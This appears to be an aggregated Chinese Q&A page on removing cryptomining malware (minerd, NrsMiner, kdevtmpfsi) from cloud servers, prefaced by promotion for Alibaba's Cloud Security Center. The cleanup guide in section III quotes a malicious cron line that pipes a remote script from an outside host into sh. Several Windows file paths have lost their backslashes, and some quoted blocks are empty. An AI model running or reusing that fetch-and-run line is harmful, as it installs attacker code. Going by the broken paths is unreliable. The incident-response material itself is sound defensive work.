阿里雲伺服器挖礦病毒專殺

Ⅰ 阿里雲雲安全中心是什麼可以為我們提供哪些安全保障

現在很多用戶上雲並不只是購買雲伺服器就完事了，為了保障網站或者應用的響應速度和安全，往往還會使用諸如CDN、雲安全中心、DDOS高仿等雲產品，其中雲安全中心是用戶購買比較多的一個安全類雲產品，下面為大家解析下雲安全中心是什麼？可以為我們提供哪些安全保障？

雲安全中心（態勢感知）是一個實時識別、分析、預警安全威脅的伺服器主機安全管理系統，通過防勒索、漏洞掃描修復、防病毒、防篡改、合規檢查等安全能力，幫助用戶實現威脅檢測、響應、溯源的自動化安全運營閉環，保護雲上主機、本地伺服器和容器安全，並滿足監管合規要求。產品詳情介紹可參考： 雲安全中心-態勢感知-漏洞掃描-安全-阿里雲

1、【飛天會員專享】飛天會員用戶享防篡改包年75折優惠， 點此進入阿里雲飛天會員中心了解
2、優惠活動【ECS首購專享】首購1核2G爆款雲伺服器+雲安全中心首年97.02元起， 點此進入阿里雲伺服器精選特惠活動購買

1、防病毒版
雲安全中心安全專家團隊通過對海量病毒樣本、持久化、攻擊方式的自動化分析，推出阿里雲機器學習病毒查殺引擎，實現一鍵式病毒查殺處置能力。
2、高級版
高級版支持漏洞修復、查殺病毒木馬，勒索軟體，挖礦病毒。如果需要全面的威脅檢測能力、基線檢查和攻擊自動溯源，建議啟用功能更強的企業版。
3、企業版
企業版是實時識別、分析、預警安全威脅的統一安全管理平台，幫助您實現威脅檢測、響應、溯源、防禦的自動化安全運營閉環，有效保護雲上資產和本地主機並滿足監管合規。
4、旗艦版〔容器安全)
旗艦版是主機、容器環境的統一安全管控平台，提供全面的運行時威脅檢測，容器網路可視化、鏡像安全掃描、漏洞修復、基線檢查、雲平台配置檢查等功能，一站式解決安全威脅。

1、安全預防

1、等保合規場景
對於等保2.0二級和三級中針對伺服器主機安全的入侵防範、身份鑒別、安全審計等方面的要求，雲安全中心（態勢感知）可應答其中15+等保標準的要求項。
可提供的安全服務為：

2、混合雲主機安全場景
雲安全中心（態勢感知）支持阿里雲、線下IDC、其他雲廠商等多種環境下的伺服器主機，通過雲安全中心控制台實現對雲上、雲外伺服器的統一防護及運維，包括病毒查殺、漏洞掃描、防勒索等安全防護，降低安全管理成本。
可提供的安全服務為：

3、容器安全場景
基於阿里雲容器安全ATT&CK攻防矩陣，雲安全中心（態勢感知）重點關注容器構建、容器部署和容器運行三大生命周期階段，通過雲原生方式，多維立體構建容器安全能力，為企業雲上容器化進程提供全方位安全保障。
可提供的安全服務為：

1、穩定性
百萬級伺服器主機裝機量，資源佔用低CPU使用率低於10%，不影響客戶正常業務。
2、統一安全管理
支持對全網伺服器主機、容器、雲產品的威脅管控，可以部署在線下IDC及其他雲平台，統一管控。
3、安全閉環能力
主動攔截主流病毒木馬，全面漏洞掃描，可一鍵修復漏洞/基線不滿足項等，降低用戶運維成本。
4、全面攻擊檢測
收集3大類型14類伺服器主機日誌，250+威脅檢測模型提供全鏈路的威脅檢測能力。

Ⅱ 雲伺服器中挖礦病毒的清除過程（二）

發現一台伺服器，CPU使用率一直50%左右，top查看一進程名稱為
-bash，按c查看詳情，名稱顯示為python
十分可疑

殺掉進程，清空crontab內容，並刪除此目錄文件，發現過一陣進程又被啟動起來了
查看/etc/cron.hourly，發現有一個sync文件，還是會定時執行，內容為

此文件還被加了保護許可權，需要用chattr去除後刪除

cron.daily cron.weekly cron.monthly裡面也有
同樣方法刪除/bin/sysdrr
至此病毒被徹底清除

刪除/opt/.new目錄時，發現此目錄下還有一個/opt/.md目錄，內容如下

病毒運行原理是

其他常用的診斷命令

關聯文章：
雲伺服器中挖礦病毒的清除過程
伺服器中毒導致的wget等系統命令失效後的恢復

參考文章：
【PC樣本分析】記錄最近與挖礦病毒的鬥智斗勇
【PC樣本分析】記錄最近與挖礦病毒的鬥智斗勇(二)

Ⅲ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

Ⅳ 伺服器上如何清除NrsMiner挖礦病毒

挖礦病毒完整清除過程如下，請在斷網情況下進行：

1.停止並禁用Hyper-VAccess Protection Agent Service服務；

2.刪除C:Windowssystem32NrsDataCache.tlb；

3.刪除C:.dll，若刪除失敗，可重命名該文件為其他名稱；

4.重啟計算機；

5.刪除C:Windowssystem32SysprepThemes和C:WindowsSysprepThemes目錄；

6.刪除C:Windowssystem32SecUpdateHost.exe。

7.到微軟官方網站下載對應操作系統補丁，下載鏈接如下：https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

8.安裝國內主流殺毒軟體，及時更新至最新病毒特徵庫。

Ⅳ 阿里雲windows伺服器如何去除挖礦病毒

找到進程，然後找到他文件路徑，幹掉進程，刪掉文件。
另外找找其他可疑進程，避免病毒有守護進程或者其他隱藏進程

Ⅵ 雲伺服器中挖礦病毒的清除過程（三）

伺服器CPU使用率50%，被兩個進程佔用，名稱分別為
-mysql
zfsutils-md5sum

使用crontab -l查看定時任務，發現病毒文件-mysql

查看這個/var/.log/目錄，發現更多病毒文件，-mysql是個腳本，內容如下

查看/etc/crontab.daily目錄，發現一個文件名為ntpdate

/bin/sysprg創建日期與ntupdate是同一天，文件大小與x86_64相同，無疑也是個病毒文件。

進入到/var/spool/cron目錄查看文件許可權，發現被加了保護，使用lsattr去除，再編輯刪除內容即可

禁用crontab

雲伺服器中挖礦病毒的清除過程（一）
雲伺服器中挖礦病毒的清除過程（二）

Ⅶ 阿里雲提示伺服器c:\windows\temp\hostdll.exe存在挖坑木馬，刪除後沒過多久就自動下載了 請問怎麼根除

殺毒軟體直接殺毒不就得了么
安裝個電腦管家到電腦上
然後使用病毒查殺，對著你的電腦殺毒就行了

Ⅷ 清除挖礦病毒kdevtmpfsi

首先確保scrapyd沒有對外網0.0.0.0開放
可以檢查阿里雲安全組
還有scrapyd包所在目錄的配置文件
一般在虛擬環境目錄/lib/python3.x/site-packages/scrapyd
vim default_scrapyd.conf 第11行，bind_address是否為0.0.0.0

evil為不正常的project

ps -ef | grep kinsing
ps -ef | grep kdevtmpfsi

查看病毒所在位置和pid
rm 刪除
kill -9 殺掉
crontab -e 刪除不正常的定時任務

ok

Ⅸ 挖礦病毒怎麼處理

挖礦病毒處理步驟如下：

1、查看伺服器進程運行狀態查看伺服器系統整體運行情況，發現名為kdevtmpfsi的挖礦進程大量佔用系統CPU使用率。

2、查看埠及外聯情況查看埠開放狀態及外聯情況，發現主機存在陌生外聯行為。對該外部地址進行查詢發現屬於國外地址，進一步確定該進程為惡意挖礦進程：定位挖礦進程及其守護進程PID挖礦病毒kdevtmpfsi在運行過程中不僅會產生進程kdevtmpfsi。

6、查看redis日誌通過查看redis配置文件/etc/redis.conf發現日誌功能未開啟。

7、查找敏感文件發現authorized_keys文件。

8、查看ssh日誌文件查看ssh日誌文件，發現大量登陸痕跡以及公鑰上傳痕跡。